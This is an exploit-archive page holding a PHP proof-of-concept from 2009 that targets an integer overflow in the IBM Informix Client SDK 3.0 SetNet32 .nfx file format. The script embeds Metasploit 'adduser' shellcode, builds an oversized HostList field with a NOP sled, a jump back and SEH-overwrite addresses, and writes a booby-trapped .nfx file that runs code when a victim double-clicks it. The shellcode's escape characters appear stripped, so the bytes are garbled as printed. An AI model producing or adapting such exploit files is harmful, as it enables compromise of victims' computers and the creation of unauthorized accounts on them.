IBM Informix Client SDK 3.0 nfx file integer overflow exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IBM Informix Client SDK 3.0 nfx file integer overflow exploit
# Published : 2009-10-05
# Author : bruiser
# Previous Title : HP LaserJet printers - Multiple Stored XSS vulnerabilities
# Next Title : HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow
<?php
/* IBM Informix Client SDK 3.0 SetNet32 File (.nfx) Hostsize integer overflow exploit
   (2k3 sp0)
   by Nine:Situations:Group::bruiser
   site: http://retrogod.altervista.org/

   vulnerable packages: IBM Informix Client SDK 3.0,
   IBM Informix Connect Runtime 3.x,
   possibly other products carrying the setnet32 utility.

   User-supplied value for the Hostsize field results in an integer overflow and
   subsequently a complete stack smash by passing an overlong string to the HostList
   one allowing an attacker to execute arbitrary code.
   All modules in memory are compiled with /SAFESEH=on but it's still possible to
   execute arbitrary code by passing a certain trusted handler from kernel32.dll.
   We fall in a more convenient condition with eip overwritten: now ebp register
   points to a portion of our buffer. So this is context-dependent, try aganst
   another OS.
   Other attacks are possible through the ProtoSize or ServerSize fields.
   It works by double clicking on the resulting .nfx file.

*/

# windows/adduser - 436 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=sun, PASS=tzu
$_scode=
"x89xe1xd9xc2xd9x71xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x45x50" .
"x43x30x4cx4bx50x45x47x4cx4cx4bx43x4cx45x55" .
"x43x48x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4b" .
"x51x4fx47x50x45x51x4ax4bx47x39x4cx4bx46x54" .
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" .
"x4dx54x49x50x44x34x44x47x49x51x49x5ax44x4d" .
"x45x51x48x42x4ax4bx4bx44x47x4bx51x44x47x54" .
"x44x44x44x35x4bx55x4cx4bx51x4fx47x54x45x51" .
"x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx45x51" .
"x4ax4bx4cx49x51x4cx47x54x45x54x48x43x51x4f" .
"x46x51x4cx36x43x50x46x36x42x44x4cx4bx51x56" .
"x50x30x4cx4bx47x30x44x4cx4cx4bx44x30x45x4c" .
"x4ex4dx4cx4bx45x38x44x48x4bx39x4ax58x4cx43" .
"x49x50x43x5ax50x50x43x58x4cx30x4dx5ax45x54" .
"x51x4fx45x38x4dx48x4bx4ex4dx5ax44x4ex51x47" .
"x4bx4fx4dx37x45x33x42x4dx45x34x46x4ex45x35" .
"x44x38x43x55x51x30x46x4fx45x33x47x50x42x4e" .
"x42x45x43x44x47x50x44x35x42x53x43x55x42x52" .
"x47x50x43x43x43x45x42x4ex51x30x43x44x43x4a" .
"x43x45x51x30x46x4fx51x51x47x34x47x34x51x30" .
"x46x46x47x56x47x50x42x4ex45x35x43x44x51x30" .
"x42x4cx42x4fx43x53x43x51x42x4cx42x47x42x52" .
"x42x4fx42x55x42x50x51x30x51x51x45x34x42x4d" .
"x43x59x42x4ex45x39x43x43x42x54x43x42x43x51" .
"x43x44x42x4fx44x32x42x53x47x50x42x53x44x35" .
"x42x4ex47x50x46x4fx47x31x50x44x47x34x45x50" .
"x41x41";

$____boom =
"[Setnet32]rn".
"Format=x203.00x203.00.TC1x20x20rn".
"[ENVIRONMENT]rn".
"CC8BITLEVEL=rn".
"CLIENT_LOCALE=EN_US.8859-1rn".
"COLLCHAR=rn".
"CONRETRY=rn".
"CONTIME=rn".
"DB2CLI=rn".
"DBANSIWARN=rn".
"DBDATE=rn".
"DBLANG=EN_US.CP1252rn".
"DBMONEY=rn".
"DBNLS=rn".
"DBPATH=rn".
"DBTEMP=rn".
"DBTIME=rn".
"DELIMIDENT=nrn".
"ESQLMF=rn".
"FET_BUF_SIZE=rn".
"BIG_FET_BUF_SIZE=rn".
"IFX_MULTIPREPSTMT=rn".
"GL_DATE=rn".
"GL_DATETIME=rn".
"IFX_EXTDIRECTIVES=rn".
"IFX_XASTDCOMPLIANCE_XAEND=rn".
"IFX_DIRTY_WAIT=rn".
"INFORMIXDIR=C:Programx20FilesIBMInformixConnect\rn".
"INFORMIXSERVER=aaaaaaaaaaaarn".
"INFORMIXSQLHOSTS=rn".
"LANG=rn".
"LC_COLLATE=rn".
"LC_CTYPE=rn".
"LC_MONETARY=rn".
"LC_NUMERIC=rn".
"LC_TIME=rn".
"DBALSBC=rn".
"DBAPICODE=rn".
"DBASCIIBC=rn".
"DBCENTURY=rn".
"DBCODESET=rn".
"DBCONNECT=rn".
"DBCSCONV=rn".
"DBCSOVERRIDE=rn".
"DBCSWIDTH=rn".
"DBFLTMSK=rn".
"DBMONEYSCALE=rn".
"DBSS2=rn".
"DBSS3=rn".
"IFX_AUTOFREE=rn".
"IFX_DEFERRED_PREPARE=rn".
"NODEFDAC=rn".
"OPTMSG=rn".
"OPTOFC=rn".
"IFX_USE_PREC_16=rn".
"IFX_PAD_VARCHAR=rn".
"NOZEROMDY=rn".
"BLANK_STRINGS_NOT_NULL=rn".
"IFX_FLAT_UCSQ=rn".
"[Size]rn".
"CLIENT_LOCALE=12rn".
"DB_LOCALE=0rn".
"NumOfHosts=999rn".
"NumOfServers=1rn".
"NumOfProtocols=9rn".
"ServerSize=16rn".

"HostSize=1517rn".                                //boom!!

"ProtoSize=16rn".
"[Lists]rn".
"INFORMIXSERVERLIST=aaaa;rn".
"HostList=".

str_repeat("x90",312).

$_scode.

str_repeat("x90",1115 - strlen($_scode)).

"xe9x01xfbxffxff".                             //jmp back to shellcode
"x90x90x90x90".                                 //junk, this is overwritten in some way
"x87x35xe4x77".                                 //pointer to the next SEH record
"x87x35xe4x77".                                 //SE handler, a registered one from kernel32.dll
"xC0xF0x03xF1".                                 //do not touch
"x41x41x41x41".                                 //do not touch
"x9bx71xd8x77".                                 //call ebp, user32.dll and further jno short
str_repeat("x9bx71xd8x77",64).                  //do not touch
";rn".
"PROTOCOLLIST=olsoctcp;onsoctcp;olsocspx;onsocspx;sesoctcp;sesocspx;seipcpip;olipcnmp;onipcnmp;rn".
"[__infx_sqlhost_aaaaaaaaaaaaaaa]rn".
"HOST=rn".
"SERVICE=1527rn".
"PROTOCOL=olsoctcprn".
"OPTIONS=rn".
"[__infx_host_192.168.0.1]rn".
"USER=informixrn".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20".
"x200x20x200x20x200x20x200x20x200rn".
"AskPassword=Prn".
"[__infx_host_192.168.0.2]rn".
"USER=aaaarn".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x2049x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200rn".
"AskPassword=Prn".
"[__infx_host_192.168.0.3]rn".
"USER=informixrn".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200rn".
"AskPassword=Prn".
"x00";

file_put_contents("9sg.nfx",$____boom);
?>